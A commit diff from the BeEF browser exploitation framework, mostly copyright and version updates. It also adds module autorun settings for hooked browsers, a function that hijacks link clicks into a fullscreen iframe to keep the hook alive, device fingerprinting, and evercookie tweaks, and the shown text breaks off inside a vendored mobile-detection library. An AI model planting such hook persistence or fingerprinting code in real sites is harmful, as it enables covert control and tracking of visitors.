Merge pull request #845 from bcoles/raw_http

Add 'bind_raw' to asset handler

.gitignore

@@ -1,3 +1,5 @@
 beef.db
 test/msf-test
-custom-config.yaml
+custom-config.yaml
+.DS_Store
+.gitignore

BeEFLive.sh

@@ -0,0 +1,2 @@
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -1,7 +1,7 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

INSTALL.txt

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 

README

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 

README.mkd

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 

Rakefile

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.8-alpha
+0.4.4.2.1-alpha

beef

@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

config.yaml

@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.8-alpha'
+    version: '0.4.4.2.1-alpha'
     debug: false
 
     restrictions:
@@ -20,6 +20,10 @@ beef:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
+        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
+        # It's not advised to decrease it with tons of hooked browsers (more than 50),
+        # because it might impact performance. Also, enable WebSockets is generally better.
+        xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
@@ -34,8 +38,8 @@ beef:
           enable: false
           secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
-          secure_port: 61986 # WSS
+          secure_port: 61986 # WSSecure
-          alive_timer: 1000 # poll BeEF every second
+          ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
@@ -55,6 +59,12 @@ beef:
         # README.databases file
 
         # supported DBs: sqlite, mysql, postgres
+        # NOTE: you must change the Gemfile adding a gem require line like:
+        #   gem "dm-postgres-adapter"
+        # or
+        #   gem "dm-mysql-adapter"
+        # if you want to switch drivers from sqlite to postgres (or mysql).
+        # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
 
         # db_file is only used for sqlite
@@ -72,6 +82,13 @@ beef:
         user:   "beef"
         passwd: "beef"
 
+    # Autorun modules as soon the browser is hooked.
+    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    autorun:
+        enable: true
+        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
+        allow_user_notify: true
+
     crypto_default_value_length: 80
 
     # You may override default extension configuration parameters here

core/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server/hook.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/bootstrap.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,8 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
+require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 

core/core.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/base.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/browser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/http.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/page.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/hbmanager.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/loader.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/client/are.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -9,8 +9,39 @@ beef.are = {
    var Jools = require('jools');
    this.ruleEngine = new Jools();
   },
-  rules:[],
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
   commands:[],
   results:[]
 };
-beef.regCmp("beef.are");
+beef.regCmp("beef.are");

core/main/client/beef.js

@@ -1,18 +1,16 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 /*!
  * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
  */
 
 $j = jQuery.noConflict();
 
-//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
-
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	
 	var BeefJS = {

core/main/client/browser/cookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser/popup.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/dom.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -108,6 +108,25 @@ beef.dom = {
 		}
 		return iframe;
 	},
+
+    /**
+     * Load the link (href value) in an overlay foreground iFrame.
+     * The BeEF hook continues to run in background.
+     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
+     * Framebusting techniques, this will not work.
+     */
+    persistentIframe: function(){
+        $j('a').click(function(e) {
+            if ($j(this).attr('href') != '')
+            {
+                e.preventDefault();
+                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                $j(document).attr('title', $j(this).html());
+                document.body.scroll = "no";
+                document.documentElement.style.overflow = 'hidden';
+            }
+        });
+    },
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true

core/main/client/encode/base64.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/json.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/geolocation.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/hardware.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -7,39 +7,51 @@
 beef.hardware = {
 
 	ua: navigator.userAgent,
-	
+
-	isWinPhone: function() {
+	cpuType: function() {
-		return (this.ua.match('(Windows Phone)')) ? true : false;
+		// IE
-	},
+		if (typeof navigator.cpuClass != 'undefined') {
-	
+			cpu = navigator.cpuClass;
-	isIphone: function() {
+			if (cpu == "x86")   return "32-bit";
-		return (this.ua.indexOf('iPhone') != -1) ? true : false;
+			if (cpu == "68K")   return "Motorola 68K";
+			if (cpu == "PPC")   return "Motorola PPC";
+			if (cpu == "Alpha") return "Digital";
+			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+		// Firefox
+        } else if (typeof navigator.oscpu != 'undefined') {
+			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+		}
+		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+		return "32-bit";
 	},
 
-	isIpad: function() {
+	isTouchEnabled: function() {
-		return (this.ua.indexOf('iPad') != -1) ? true : false;
+		if ('ontouchstart' in document) return true;
+		return false;
 	},
 
-	isIpod: function() {
+	isVirtualMachine: function() {
-		return (this.ua.indexOf('iPod') != -1) ? true : false;
+		if (screen.width % 2 || screen.height % 2) return true;
+		return false;
+	},
+
+	isLaptop: function() {
+		// Most common laptop screen resolution
+		if (screen.width == 1366 && screen.height == 768) return true;
+		// Netbooks
+		if (screen.width == 1024 && screen.height == 600) return true;
+		return false;
 	},
 
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
 
-	isBlackBerry: function() {
-		return (this.ua.match('BlackBerry')) ? true : false;
-	},
-
 	isZune: function() {
 		return (this.ua.match('ZuneWP7')) ? true : false;
 	},
 
-	isKindle: function() {
-		return (this.ua.match('Kindle')) ? true : false;
-	},
-
 	isHtc: function() {
 		return (this.ua.match('HTC')) ? true : false;
 	},
@@ -48,10 +60,6 @@ beef.hardware = {
 		return (this.ua.match('Ericsson')) ? true : false;
 	},
 
-	isNokia: function() {
-		return (this.ua.match('Nokia')) ? true : false;
-	},
-
 	isMotorola: function() {
 		return (this.ua.match('Motorola')) ? true : false;
 	},
@@ -60,20 +68,59 @@ beef.hardware = {
 		return (this.ua.match('Nexus One')) ? true : false;
 	},
 
-	getName: function() {
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.hardware.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
 
-		if (this.isNokia()) return 'Nokia';
+	getName: function() {
-		if (this.isWinPhone()) return 'Windows Phone';
+                var ua = navigator.userAgent.toLowerCase();
-		if (this.isBlackBerry()) return 'BlackBerry';
+                if(DetectIphone())              { return "iPhone"};
-		if (this.isIphone()) return 'iPhone';
+                if(DetectIpod())                { return "iPod Touch"};
-		if (this.isIpad()) return 'iPad';
+                if(DetectIpad())                { return "iPad"};
-		if (this.isIpod()) return 'iPod';
+		if (this.isHtc())               { return 'HTC'};
-		if (this.isKindle()) return 'Kindle';
+		if (this.isMotorola())          { return 'Motorola'};
-		if (this.isHtc()) return 'HTC';
+		if (this.isZune())              { return 'Zune'};
-		if (this.isMotorola()) return 'Motorola';
+		if (this.isGoogle())            { return 'Google Nexus One'};
-		if (this.isZune()) return 'Zune';
+		if (this.isEricsson())          { return 'Ericsson'};
-		if (this.isGoogle()) return 'Google';
+                if(DetectAndroidPhone())        { return "Android Phone"};
-		if (this.isEricsson()) return 'Ericsson';
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation"};
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
+				if(this.isLaptop())							{ return "Laptop"};
+                if(this.isVirtualMachine())                 { return "Virtual Machine"};
 
 		return 'Unknown';
 	}

core/main/client/init.js

@@ -1,14 +1,18 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
-
+/**
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
+ * @literal object: beef.init
-// and will have a new session id. The new session id will need to know
+ * Contains the beef_init() method which starts the BeEF client-side
-// the brwoser details. So sendback the browser details again.
+ * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
-
+ *
+ * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
+ * and will have a new session id. The new session id will need to know
+ * the brwoser details. So sendback the browser details again.
+ */
 BEEFHOOK = beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
@@ -49,6 +53,13 @@ window.onclose = function (event) {
     }
 };
 
+/**
+ * Starts the polling mechanism, and initialize various components:
+ *  - browser details (see browser.js) are sent back to the "/init" handler
+ *  - the polling starts (checks for new commands, and execute them)
+ *  - the logger component is initialized (see logger.js)
+ *  - the Autorun Engine is initialized (see are.js)
+ */
 function beef_init() {
     if (!beef.pageIsLoaded) {
         beef.pageIsLoaded = true;
@@ -58,15 +69,12 @@ function beef_init() {
             beef.updater.execute_commands();
             beef.logger.start();
             beef.are.init();
-
+        }else {
-        }
-        else {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
             beef.are.init();
         }
-
     }
 }

core/main/client/lib/evercookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
 
 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
+    try{
-	{
+        if (typeof(value) != "undefined")
-		// expire the cookie first
+        {
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            // expire the cookie first
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-	}
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	else
+        }
-		return this.getFromStr(name, document.cookie);
+        else
+            return this.getFromStr(name, document.cookie);
+    }catch(e){
+        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // evercookie_userdata and evercookie_window will be used in this case.
+    }
 };
 
 // get value from param-like string (eg, "x=y&name=VALUE")

core/main/client/lib/mdetect.js

@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
